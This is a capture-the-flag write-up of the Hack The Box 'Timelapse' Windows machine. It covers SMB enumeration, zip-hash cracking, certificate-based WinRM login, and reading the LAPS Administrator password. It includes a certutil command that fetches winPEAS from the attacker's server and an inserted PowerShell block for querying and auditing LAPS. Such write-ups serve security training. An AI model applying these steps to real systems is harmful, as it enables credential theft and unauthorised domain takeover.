Timelapse

Timelapse is an easy Windows machine. While some HTB machine names hint at how to exploit them, this one is vague: it actually relates to the Local Administrator Password Solution (LAPS) and has absolutely nothing to do with time.

LAPS manages the local account passwords of domain-joined computers. The passwords are stored in Active Directory (AD) and protected by an ACL, so only eligible users can read them or request a reset. You can read more about it here.

Enumeration

As usual, we fire up Nmap to see what services are running:


nmap -Pn -T4 -p- -A 10.10.11.152

  • -Pn: Treat the host as online, in case ICMP is blocked on the machine

  • -T4: Timing template to speed up the scan (the default is T3)

  • -p-: Scan all 65535 ports instead of the default 1000 most common ports

  • -A: Enable additional advanced and aggressive options (OS detection, version detection, script scanning and traceroute)

From the result, there are quite a lot of open ports on the machine, but a few are particularly interesting:

  • port 88: Kerberos-sec

  • port 139/445: netbios-ssn/SMB

  • port 389: LDAP

SMB looks interesting: since it is a file-sharing service, it may contain helpful files. To check this, let's use "smbclient".

After running smbclient we see some share names, but some are empty and we get an "access denied" message on all of them except "Shares".

Let's access "Shares". As seen below, we found two folders as well as some files. We can transfer these files to our system with the "get" command.

All the documents are simply manuals for LAPS and contain no sensitive data or credentials. The zip file, on the other hand, is interesting, as it is password protected.

With zip2john we are able to extract the password hash, and with john we crack it. The archive contains a single file named "legacyy_dev_auth.pfx"; a little searching and you might find something like this on .pfx files.

User

So, we have a .pfx file. What we have to do now is extract both the private key and the certificate from it.

We will be doing this using openssl, and this Stack Overflow article is of great help.

As seen below, both the private key and the certificate have been created. The next step is to use them.

With the certificate and key in hand, we log in to the host using evil-winrm and the extracted certs.

Evil WinRM is the ultimate WinRM shell for pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol.

As seen below, we log in as user legacyy with the certs.

Doing a little user enumeration, we found other users on the system, but we can't really say whether they are system users or were created by other HTB players. Running net user legacyy tells us a bit more about the user we are currently logged in as.

...aaand, we have the user flag.

Privilege Escalation

We have user; now, to escalate our privileges to SYSTEM, let's upload WinPEAS. WinPEAS is a tool that scans the system for possible privilege escalation vectors. It can be downloaded here.

We set up a Python HTTP server on our system:

python3 -m http.server

then run the command below on the victim machine to transfer the file.

We can achieve the same aim using the command:

certutil -urlcache -f http://10.10.14.113:8000/winPEASx64.exe C:\Users\legacyy\winPEASx64.exe

After running WinPEAS we found an interesting PowerShell history text file.

We cd into this directory and find some PowerShell commands that include the password for user "svc_deploy". Let's replay these commands.

After running the exact commands from the file, we are able to run commands as user svc_deploy, as seen below.

Now, let's check what groups user svc_deploy belongs to...

...as seen below, the user belongs to a local group called LAPS_Readers.

Knowing we have read access to LAPS passwords, we can query Active Directory with the "Get-ADComputer" command to get the Administrator password. As we can see, the "ms-Mcs-AdmPwd" attribute holds the domain controller's local Administrator password.
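The LAPS query described above, plus the audit an administrator would run to find out who holds that read right, as an added example that is not part of the original write-up. It assumes the RSAT ActiveDirectory module and the legacy LAPS AdmPwd.PS module are installed; the computer name DC01 and the OU path are placeholders.

```powershell
# Added example, not from the write-up. Assumes the ActiveDirectory (RSAT) and
# AdmPwd.PS (legacy LAPS) modules are present; DC01 and the OU are placeholders.
Import-Module ActiveDirectory

function Get-LapsPasswordStatus {
    param([Parameter(Mandatory)][string]$ComputerName)

    # ms-Mcs-AdmPwd is the clear-text local Administrator password that legacy
    # LAPS writes to the computer object; AD only returns it when requested
    # explicitly and only if the caller's ACL permits the read.
    $c = Get-ADComputer -Identity $ComputerName `
            -Properties 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'

    # The expiration time is a Windows FILETIME (100 ns ticks since 1601-01-01).
    $expires = $null
    if ($c.'ms-Mcs-AdmPwdExpirationTime') {
        $expires = [DateTime]::FromFileTimeUtc([int64]$c.'ms-Mcs-AdmPwdExpirationTime')
    }

    [pscustomobject]@{
        Computer         = $c.Name
        PasswordReadable = [bool]$c.'ms-Mcs-AdmPwd'   # $false: the ACL blocked the read
        ExpiresUtc       = $expires
    }
}

# Defender-side check: which principals can read ms-Mcs-AdmPwd under an OU?
# Find-AdmPwdExtendedRights ships with the AdmPwd.PS module of legacy LAPS.
function Get-LapsReaders {
    param([Parameter(Mandatory)][string]$SearchBase)
    Import-Module AdmPwd.PS
    Find-AdmPwdExtendedRights -Identity $SearchBase -IncludeComputers |
        ForEach-Object {
            [pscustomobject]@{
                Object  = $_.ObjectDN
                Readers = ($_.ExtendedRightHolders -join ', ')
            }
        }
}

Get-LapsPasswordStatus -ComputerName 'DC01'
Get-LapsReaders -SearchBase 'OU=Domain Controllers,DC=example,DC=local'
```

A group such as LAPS_Readers showing up in the Readers column is exactly the exposure this box relies on, so the second function is the one to run regularly.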

With evil-winrm once again, we were able to log in as "Administrator" without breaking a sweat.

Checking "C:\Users\Administrator\Desktop", the flag was not there; it is actually located under another admin user's home directory, "C:\Users\TRX\Desktop".

Hope you had as much fun as I did rooting this box... Cheers!!!